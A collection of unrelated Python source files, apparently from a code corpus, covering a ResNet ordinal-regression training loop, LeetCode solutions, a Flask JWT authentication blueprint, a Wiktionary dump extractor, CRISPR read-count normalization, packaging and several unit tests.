num_workers=NUM_WORKERS,
sampler=train_sampler)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS,
sampler=valid_sampler)
test_loader = DataLoader(dataset=test_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
else:
GRAYSCALE = False
RESNET34_AVGPOOLSIZE = 4
df = pd.read_csv(DATASET_INFO['TRAIN_CSV_PATH'], index_col=0)
classes = df[DATASET_INFO['CLASS_COLUMN']].values
del df
train_labels = torch.tensor(classes, dtype=torch.float)
NUM_CLASSES = torch.unique(train_labels).size()[0]
del classes
train_dataset = PyTorchDataset(csv_path=DATASET_INFO['TRAIN_CSV_PATH'],
img_dir=DATASET_INFO['IMAGE_PATH'],
transform=train_transform())
test_dataset = PyTorchDataset(csv_path=DATASET_INFO['TEST_CSV_PATH'],
img_dir=DATASET_INFO['IMAGE_PATH'],
transform=validation_transform())
valid_dataset = PyTorchDataset(csv_path=DATASET_INFO['VALID_CSV_PATH'],
img_dir=DATASET_INFO['IMAGE_PATH'],
transform=validation_transform())
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=NUM_WORKERS)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
test_loader = DataLoader(dataset=test_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
info_dict['dataset'] = DATASET_INFO
info_dict['settings']['num classes'] = NUM_CLASSES
##########################
# MODEL
##########################
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes, grayscale):
self.num_classes = num_classes
self.inplanes = 64
if grayscale:
in_dim = 1
else:
in_dim = 3
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(in_dim, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AvgPool2d(RESNET34_AVGPOOLSIZE)
self.fc = nn.Linear(512, (self.num_classes-1))
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, (2. / n)**.5)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
logits = self.fc(x)
logits = logits.view(-1, (self.num_classes-1))
probas = torch.sigmoid(logits)
return logits, probas
def resnet34(num_classes, grayscale):
"""Constructs a ResNet-34 model."""
model = ResNet(block=BasicBlock,
layers=[3, 4, 6, 3],
num_classes=num_classes,
grayscale=grayscale)
return model
###########################################
# Initialize Cost, Model, and Optimizer
###########################################
model = resnet34(NUM_CLASSES, GRAYSCALE)
model.to(DEVICE)
if args.optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
elif args.optimizer == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), lr=LEARNING_RATE,
momentum=0.9)
else:
raise ValueError('--optimizer must be "adam" or "sgd"')
if args.scheduler:
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min',
verbose=True)
start_time = time.time()
best_mae, best_rmse, best_epoch = 999, 999, -1
info_dict['training'] = {
'num epochs': NUM_EPOCHS,
'iter per epoch': len(train_loader),
'minibatch loss': [],
'epoch train mae': [],
'epoch train rmse': [],
'epoch train acc': [],
'epoch valid mae': [],
'epoch valid rmse': [],
'epoch valid acc': [],
'best running mae': np.infty,
'best running rmse': np.infty,
'best running acc': 0.,
'best running epoch': -1
}
for epoch in range(1, NUM_EPOCHS+1):
model.train()
for batch_idx, (features, targets) in enumerate(train_loader):
features = features.to(DEVICE)
targets = targets.to(DEVICE)
# FORWARD AND BACK PROP
logits, probas = model(features)
# ### Ordinal loss
loss = loss_conditional_v2(logits, targets, NUM_CLASSES)
# ##--------------------------------------------------------------------###
optimizer.zero_grad()
loss.backward()
optimizer.step()
# ITERATION LOGGING
iteration_logging(info_dict=info_dict, batch_idx=batch_idx,
loss=loss, train_dataset=train_dataset,
frequency=50, epoch=epoch)
# EPOCH LOGGING
# function saves best model as best_model.pt
best_mae = epoch_logging(info_dict=info_dict,
model=model, train_loader=train_loader,
valid_loader=valid_loader,
which_model='conditional-argmax',
loss=loss, epoch=epoch, start_time=start_time,
skip_train_eval=SKIP_TRAIN_EVAL)
if args.scheduler:
scheduler.step(info_dict['training']['epoch valid rmse'][-1])
# ####### AFTER TRAINING EVALUATION
# function saves last model as last_model.pt
info_dict['last'] = {}
aftertraining_logging(model=model, which='last', info_dict=info_dict,
train_loader=train_loader,
valid_loader=valid_loader, test_loader=test_loader,
which_model='conditional-argmax',
start_time=start_time)
info_dict['best'] = {}
aftertraining_logging(model=model, which='best', info_dict=info_dict,
train_loader=train_loader,
valid_loader=valid_loader, test_loader=test_loader,
which_model='conditional-argmax',
start_time=start_time)
# ######### MAKE PLOTS ######
plot_training_loss(info_dict=info_dict, averaging_iterations=100)
plot_mae(info_dict=info_dict)
plot_accuracy(info_dict=info_dict)
# ######### PER-CLASS MAE PLOT #######
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
drop_last=False,
num_workers=NUM_WORKERS)
for best_or_last in ('best', 'last'):
model.load_state_dict(torch.load(
os.path.join(info_dict['settings']['output path'], f'{best_or_last}_model.pt')))
names = {0: 'train',
1: 'test'}
for i, data_loader in enumerate([train_loader, test_loader]):
true_labels = get_labels_from_loader(data_loader)
# ######### SAVE PREDICTIONS ######
all_probas, all_predictions = save_predictions(model=model,
which=best_or_last,
which_model='conditional-argmax',
info_dict=info_dict,
data_loader=data_loader,
prefix=names[i])
errors, counts = compute_per_class_mae(actual=true_labels.numpy(),
predicted=all_predictions.numpy())
info_dict[f'per-class mae {names[i]} ({best_or_last} model)'] = errors
#actual_selfentropy_best, best_selfentropy_best =\
# compute_selfentropy_for_mae(errors_best)
#info_dict['test set mae self-entropy'] = actual_selfentropy_best.item()
#info_dict['ideal test set mae self-entropy'] = best_selfentropy_best.item()
plot_per_class_mae(info_dict)
# ######## CLEAN UP ########
json.dump(info_dict, open(os.path.join(PATH, 'info_dict.json'), 'w'), indent=4)
if not SAVE_MODELS:
os.remove(os.path.join(PATH, 'best_model.pt'))
os.remove(os.path.join(PATH, 'last_model.pt'))
|
# author: Fei Gao
#
# Reverse Integer
#
# Reverse digits of an integer.
# Example1: x = 123, return 321
# Example2: x = -123, return -321
#
# click to show spoilers.
# Have you thought about this?
# Here are some good questions to ask before coding. Bonus points
# for you if you have already thought through this!
# If the integer's last digit is 0, what should the output be? ie,
# cases such as 10, 100.
# Did you notice that the reversed integer might overflow? Assume
# the input is a 32-bit integer, then the reverse of 1000000003
# overflows. How should you handle such cases?
# Throw an exception? Good, but what if throwing an exception is
# not an option? You would then have to re-design the function
# (ie, add an extra parameter).
class Solution:
# @return an integer
def reverse(self, x):
return int((('-' if x < 0 else '') + str(abs(x))[::-1]))
def main():
solver = Solution()
tests = [123, -123, 0, -1]
for test in tests:
print(test)
print(' ->')
result = solver.reverse(test)
print(result)
print('~' * 10)
pass
if __name__ == '__main__':
main()
pass
|
from flask import jsonify, request
from flask_jwt_extended import create_access_token, jwt_refresh_token_required, get_current_user
from app.blueprints.recipes.errors import bad_request, error_response
from app.blueprints.auth import bp
from app.blueprints.auth.helpers import get_fresh_jwt_token, send_password_reset_email
from app.services.auth import create_user, get_user_by_email, verify_reset_password_token, set_new_password
from app.utils.validators import validate_email, validate_username, validate_password
@bp.route('/login', methods=['POST'])
def login():
json = request.json
if json:
username = json.get('username', '')
password = json.get('password', '')
else:
return bad_request("Lack of required payload data")
payload = get_fresh_jwt_token(username, password, with_refresh_token=True)
if payload:
return jsonify(payload), 200
else:
return error_response(401, "Bad username or password")
@bp.route('/refresh', methods=['POST'])
@jwt_refresh_token_required
def refresh():
user = get_current_user()
ret = {
'access_token': create_access_token(identity=user, fresh=False)
}
return jsonify(ret), 200
@bp.route('/fresh-login', methods=['POST'])
def fresh_login():
json = request.json
if json:
username = json.get('username', '')
password = json.get('password', '')
else:
return bad_request("Lack of required payload data")
payload = get_fresh_jwt_token(username, password, with_refresh_token=False)
if payload:
return jsonify(payload), 200
else:
return error_response(401, "Bad username or password")
@bp.route('/validate', methods=['POST'])
def validate():
json = request.json
if json:
email = json.get('email', None)
username = json.get('username', None)
else:
return bad_request("Lack of required payload data")
payload = {}
if email is not None:
is_valid, check_dict = validate_email(email)
payload['email'] = {'valid': is_valid, 'checks': check_dict}
if username is not None:
is_valid, check_dict = validate_username(username)
payload['username'] = {'valid': is_valid, 'checks': check_dict}
return jsonify(payload), 200
@bp.route('/register', methods=['POST'])
def register():
json = request.json
if json:
username = json.get('username', '')
password = json.get('password', '')
email = json.get('email', '')
else:
return bad_request("Lack of required payload data")
payload = {}
is_email_valid, email_check_dict = validate_email(email)
payload['email'] = {'valid': is_email_valid, 'checks': email_check_dict}
is_username_valid, username_check_dict = validate_username(username)
payload['username'] = {'valid': is_username_valid, 'checks': username_check_dict}
is_password_valid, password_check_dict = validate_password(password)
payload['password'] = {'valid': is_password_valid, 'checks': password_check_dict}
if is_email_valid & is_password_valid & is_username_valid:
create_user(username, email, password)
status_code = 201
else:
status_code = 422
return jsonify(payload), status_code
@bp.route('/reset_password', methods=['POST'])
def reset_password_request():
json = request.json
if json:
email = json.get('email', '')
else:
return bad_request("Lack of required payload data")
user = get_user_by_email(email)
if user:
send_password_reset_email(user)
return jsonify({'message': 'Done!'}), 202
else:
return error_response(422, "Email address not registered")
@bp.route('/reset_password/<token>', methods=['POST'])
def reset_password(token):
json = request.json
if json:
password = json.get('password', '')
else:
return bad_request("Lack of required payload data")
user = verify_reset_password_token(token)
if not user:
return error_response(401, 'Invalid token')
is_password_valid, password_check_dict = validate_password(password)
if is_password_valid:
set_new_password(user, password)
return jsonify({'message': 'Done!'}), 200
else:
payload = {'password': {'valid': is_password_valid, 'checks': password_check_dict}}
return jsonify(payload), 422
|
import string
def filter_to_list(filterFunc, l):
return list(filter(filterFunc, l))
def keys_from_template_string(tempStr):
stringTuples = list(string.Formatter.parse("", tempStr))
# Special case: string with no template arguments
firstTuple = stringTuples[0]
if(firstTuple[1] == None and firstTuple[2] == None and firstTuple[3] == None):
return []
else:
keyNames = list(map(lambda el: el[1], stringTuples))
return list(filter(lambda x: x != None, keyNames))
def have_keys_for_template_string(d, tempStr):
tempStrKeys = keys_from_template_string(tempStr)
if(len(tempStrKeys) == 0):
return True
else:
return set(tempStrKeys).issubset(set(d))
|
#!/usr/bin/env python3
import os
import sys
import argparse
pageCount = 0
noErrors = True
def updatePageCount():
global pageCount
pageCount += 1
sys.stdout.write("\rFound {} pages".format(pageCount))
sys.stdout.flush()
def printMessage(message):
sys.stdout.write(message)
sys.stdout.flush()
def main():
parser = argparse.ArgumentParser(
description='Extract data from Wiktionary xml dump'
)
parser.add_argument(
'file',
type=str,
help='Wiktionary xml dump of article pages'
)
parser.add_argument(
'-o',
type=str,
help='Output file name'
)
args = parser.parse_args()
inputfile = None
outputfile = None
if not os.path.isfile(args.file):
printMessage("File {} does not exist. Exiting...".format(args.file))
sys.exit()
try:
inputfile = open(args.file, 'r', encoding='utf-8')
outputfile = open(args.file + '.en', 'w+', encoding='utf-8')
line = inputfile.readline()
# Find first occurence of <page>
while line:
if '<page>' in line:
updatePageCount()
break
line = inputfile.readline()
page = ''
while line:
if '</page>' in line:
page += line
if '<ns>10</ns>' in page:
outputfile.writelines(page)
page = ''
elif '<page>' in line:
updatePageCount()
page = ''
page += line
else:
page += line
line = inputfile.readline()
except Exception as e:
global noErrors
noErrors = False
printMessage(e)
return
finally:
inputfile.close()
outputfile.close()
if noErrors:
printMessage('English pages extracted successfully')
return
if __name__ == '__main__':
main()
|
#######################################################################
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Curtesy of https://github.com/armooo/suds_requests
# author: Jason Michalski
# email: armooo@armooo.net
# License: MIT
#######################################################################
import os
import sys
import mock
import pytest
import requests
import suds.transport
PROJECT_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__),
os.pardir)
)
sys.path.append(PROJECT_ROOT)
import RFEM.suds_requests as suds_requests
def test_no_errors():
m = mock.Mock(__name__='m')
f = suds_requests.handle_errors(m)
assert f() == m.return_value
def test_HTTPError():
resp = mock.Mock(status_code=404,
content=b'File not found')
m = mock.Mock(
side_effect=requests.HTTPError(response=resp),
__name__='m',
)
f = suds_requests.handle_errors(m)
with pytest.raises(suds.transport.TransportError) as excinfo:
f()
assert excinfo.value.httpcode == 404
assert excinfo.value.fp.read() == b'File not found'
def test_RequestException():
m = mock.Mock(
side_effect=requests.RequestException(),
__name__='m',
)
f = suds_requests.handle_errors(m)
with pytest.raises(suds.transport.TransportError) as excinfo:
f()
assert excinfo.value.httpcode == 000
assert excinfo.value.fp.read().startswith(b'Traceback')
def test_open():
session = mock.Mock()
session.get.return_value.content = b'abc123'
transport = suds_requests.RequestsTransport(session)
request = suds.transport.Request('http://url')
response = transport.open(request)
assert response.read() == b'abc123'
def test_send():
session = mock.Mock()
session.post.return_value.content = b'abc123'
session.post.return_value.headers = {
1: 'A',
2: 'B',
}
session.post.return_value.status_code = 200
transport = suds_requests.RequestsTransport(session)
request = suds.transport.Request(
'http://url',
'I AM SOAP! WHY AM I NOT CLEAN!!!',
)
request.headers = {
'A': 1,
'B': 2,
}
reply = transport.send(request)
session.post.assert_called_with(
'http://url',
data='I AM SOAP! WHY AM I NOT CLEAN!!!',
headers={
'A': 1,
'B': 2,
},
)
assert reply.code == 200
assert reply.headers == {
1: 'A',
2: 'B',
}
assert reply.message == b'abc123'
|
# encoding='utf-8'
'''
/**
* This is the solution of No. 867 problem in the LeetCode,
* the website of the problem is as follow:
* https://leetcode-cn.com/problems/transpose-matrix
*
* The description of problem is as follow:
* ==========================================================================================================
* 给定一个矩阵 A, 返回 A 的转置矩阵。
*
* 矩阵的转置是指将矩阵的主对角线翻转,交换矩阵的行索引与列索引。
*
* 示例 1:
*
* 输入:[[1,2,3],[4,5,6],[7,8,9]]
* 输出:[[1,4,7],[2,5,8],[3,6,9]]
* 示例 2:
*
* 输入:[[1,2,3],[4,5,6]]
* 输出:[[1,4],[2,5],[3,6]]
*
* 来源:力扣(LeetCode)
* ==========================================================================================================
*
* @author zhangyu (zhangyuyu417@gmail.com)
*/
'''
from typing import List
import numpy as np
class Solution:
def transpose(self, arr: List[List[int]]) -> List[List[int]]:
'''
转置二维数组
Args:
arr: 二维数组
Returns:
转置后的数组
'''
return zip(*arr)
def transpose(self, arr: List[List[int]]) -> List[List[int]]:
'''
转置二维数组
Args:
arr: 二维数组
Returns:
转置后的数组
'''
m, n = len(arr[0]), len(arr)
new_arr = np.zeros((m, n), dtype=int)
for i in range(len(arr)):
for j in range(arr[0]):
new_arr[j][i] = arr[i][j]
return new_arr
if __name__ == '__main__':
nums = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
solution = Solution()
res = solution.transpose(nums)
print(res)
|
import setuptools
requirements = ["click >= 7.0", "Pillow >= 7.0.0"]
dev_requirements = ["black >= 19.10b0", "pre-commit >= 1.20.0"]
test_requirements = [
"coveralls >= 1.11.0",
"pytest >= 5.2.4",
"pytest-cov >= 2.8.1",
"pytest-mock >= 2.0.0",
]
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="embroidery",
version="0.0.1",
author="Gustavo Barbosa",
author_email="gustavocsb@gmail.com",
description="Embroider build variants to your mobile app icon",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/barbosa/embroidery",
packages=setuptools.find_packages(),
install_requires=requirements,
extras_require={"dev": dev_requirements, "test": test_requirements},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
entry_points="""
[console_scripts]
embroidery = embroidery:embroidery
""",
zip_safe=False,
include_package_data=True,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 13 09:23:51 2017
@author: philipp
"""
# Analyze count distribution
# =======================================================================
# Imports
from __future__ import division # floating point division by default
import sys
import yaml
import os
import glob
import pandas
import scipy.stats.mstats as sc
import numpy
import time
def Normalization():
# ------------------------------------------------
# Print header
# ------------------------------------------------
print('++++++++++++++++++++++++++++++++++++++++++++++++')
start = time.time()
# ------------------------------------------------
# Get parameters
# ------------------------------------------------
configFile = open('configuration.yaml','r')
config = yaml.safe_load(configFile)
configFile.close()
ScriptsDir = config['ScriptsDir']
sgRNAReadCountDir = config['sgRNAReadCountDir']
GeneReadCountDir = config['GeneReadCountDir']
delta = config['delta']
norm = config['Normalization']
RoundCount = config['RoundCount']
NormSuffix = '_normalized.txt'
N0 = 1000000
eps = 0.001
# ------------------------------------------------
# Get files
# ------------------------------------------------
os.chdir(sgRNAReadCountDir)
FileNames_u = glob.glob('*_GuideCounts.txt')
colnames_u = ['sgRNA','gene','counts']
os.chdir(GeneReadCountDir)
FileNames_g = glob.glob('*_GeneCounts.txt')
colnames_g = ['gene','counts']
# ------------------------------------------------
# Normalization to counts per million
# ------------------------------------------------
if norm == 'cpm':
print('Normalizing to counts per million reads ...')
# sgRNA counts
os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * N0)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * N0 for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * N0)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * N0 for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization to mean total read count across replicates
# ------------------------------------------------------------
elif norm == 'total':
print('Normalizing to mean total read count ...')
os.chdir(sgRNAReadCountDir)
TotalCounts = list()
for filename in FileNames_u:
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
TotalCounts.append(numpy.sum(x))
MeanCount = numpy.mean(TotalCounts)
# sgRNA counts
os.chdir(sgRNAReadCountDir)
for filename in FileNames_u:
print('Processing file '+filename+' ...')
GuideCounts = pandas.read_table(filename,sep='\t',names=colnames_u)
L = len(GuideCounts)
sgIDs = list(GuideCounts['sgRNA'])
geneIDs = list(GuideCounts['gene'])
ReadsPerGuide = list(GuideCounts['counts'])
N = sum(ReadsPerGuide)
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(ReadsPerGuide[k]/N * MeanCount)) for k in range(L)]
else:
ReadsPerGuide_0 = [ReadsPerGuide[k]/N * MeanCount for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
print('Processing file '+filename+' ...')
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
N = sum(ReadsPerGene)
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/N * MeanCount)) for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/N * MeanCount for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Normalization by size-factor (Love et al., Genome Biol 2014)
# ------------------------------------------------------------
elif norm == 'size':
print('Normalizing by size-factors ...')
# Establish data frame
os.chdir(sgRNAReadCountDir)
filename = FileNames_u[0]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
sgIDs = list(SampleFile['sgRNA'])
geneIDs = list(SampleFile['gene'])
L = len(sgIDs)
RawCounts = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
SizeFactors = pandas.DataFrame(data = {'sgRNA': [sgIDs[k] for k in range(L)],
'gene': [geneIDs[k] for k in range(L)]},
columns = ['sgRNA','gene'])
# Compute geometric means for all sgRNAs
print('Computing geometric means ...')
for filename in FileNames_u:
sample = filename[0:-16]
SampleFile = pandas.read_table(filename, sep='\t',names=colnames_u)
x = list(SampleFile['counts'])
RawCounts[sample] = x
SizeFactors[sample] = [x[k] if x[k]>0 else x[k]+eps for k in range(L)]
geomean = [sc.gmean(list(SizeFactors.iloc[k,2:])) for k in range(L)]
SizeFactors['Geom mean'] = geomean
# Compute size-factors for each sgRNA and each sample
print('Computing sgRNA size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
x = SizeFactors[sample]
g0 = SizeFactors['Geom mean']
x0_k = [x[k]/g0[k] for k in range(L)]
SizeFactors[sample+' sgRNA size-factors'] = [x0_k[k] for k in range(L)]
# Compute size-factor for each sample
print('Computing sample size-factors ...')
for filename in FileNames_u:
sample = filename[0:-16]
SizeFactors[sample+' size-factor'] = numpy.median(SizeFactors[sample+' sgRNA size-factors'])
# Write size-factor dataframe
SizeFactors.to_csv('Size-factors.txt',sep='\t',index=False)
# Write normalized counts dataframe
print('Writing normalized read counts ...')
# sgRNA counts
for filename in FileNames_u:
sample = filename[0:-16]
if RoundCount:
ReadsPerGuide_0 = [int(numpy.round(RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k])) \
for k in range(L)]
else:
ReadsPerGuide_0 = [RawCounts[sample][k]/SizeFactors[sample+' size-factor'][k] for k in range(L)]
GuideCounts0_Filename = filename[0:-4] + NormSuffix
GuideCounts0 = pandas.DataFrame()
GuideCounts0['sgID'] = sgIDs
GuideCounts0['geneID'] = geneIDs
GuideCounts0['Norm. Read Counts'] = ReadsPerGuide_0
GuideCounts0.to_csv(GuideCounts0_Filename, sep = '\t', index = False, header = False)
# gene counts
os.chdir(GeneReadCountDir)
for filename in FileNames_g:
sample = filename[0:-15]
GeneCounts = pandas.read_table(filename,sep='\t',names=colnames_g)
G = len(GeneCounts)
geneIDs = list(GeneCounts['gene'])
ReadsPerGene = list(GeneCounts['counts'])
if RoundCount:
ReadsPerGene_0 = [int(numpy.round(ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j])) \
for j in range(G)]
else:
ReadsPerGene_0 = [ReadsPerGene[j]/SizeFactors[sample+' size-factor'][j] for j in range(G)]
GeneCounts0_Filename = filename[0:-4] + NormSuffix
GeneCounts0 = pandas.DataFrame()
GeneCounts0['geneID'] = geneIDs
GeneCounts0['Norm. Read Counts'] = ReadsPerGene_0
GeneCounts0.to_csv(GeneCounts0_Filename, sep = '\t', index = False, header = False)
# ------------------------------------------------------------
# Spelling error catch
# ------------------------------------------------------------
else:
print('### ERROR: Check spelling of Normalization parameter in configuration file! ###')
# --------------------------------------
# Time stamp
# --------------------------------------
os.chdir(ScriptsDir)
end = time.time()
# Final time stamp
print('------------------------------------------------')
print('Script completed.')
sec_elapsed = end - start
if sec_elapsed < 60:
time_elapsed = sec_elapsed
print('Time elapsed (Total) [secs]: ' + '%.3f' % time_elapsed +'\n')
elif sec_elapsed < 3600:
time_elapsed = sec_elapsed/60
print('Time elapsed (Total) [mins]: ' + '%.3f' % time_elapsed +'\n')
else:
time_elapsed = sec_elapsed/3600
print('Time elapsed (Total) [hours]: ' + '%.3f' % time_elapsed +'\n')
if __name__ == "__main__":
Normalization()
|
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
class AdminTestCase(PluginTestCase):
plugins = ('Admin',)
def testChannels(self):
def getAfterJoinMessages():
m = self.irc.takeMsg()
self.assertEqual(m.command, 'MODE')
m = self.irc.takeMsg()
self.assertEqual(m.command, 'WHO')
self.assertRegexp('channels', 'not.*in any')
self.irc.feedMsg(ircmsgs.join('#foo', prefix=self.prefix))
getAfterJoinMessages()
self.assertRegexp('channels', '#foo')
self.irc.feedMsg(ircmsgs.join('#bar', prefix=self.prefix))
getAfterJoinMessages()
self.assertRegexp('channels', '#bar and #foo')
self.irc.feedMsg(ircmsgs.join('#Baz', prefix=self.prefix))
getAfterJoinMessages()
self.assertRegexp('channels', '#bar, #Baz, and #foo')
def testIgnoreAddRemove(self):
self.assertNotError('admin ignore add foo!bar@baz')
self.assertError('admin ignore add alsdkfjlasd')
self.assertNotError('admin ignore remove foo!bar@baz')
self.assertError('admin ignore remove foo!bar@baz')
def testIgnoreList(self):
self.assertNotError('admin ignore list')
self.assertNotError('admin ignore add foo!bar@baz')
self.assertNotError('admin ignore list')
self.assertNotError('admin ignore add foo!bar@baz')
self.assertRegexp('admin ignore list', 'foo')
def testCapabilityAdd(self):
self.assertError('capability add foo bar')
u = ircdb.users.newUser()
u.name = 'foo'
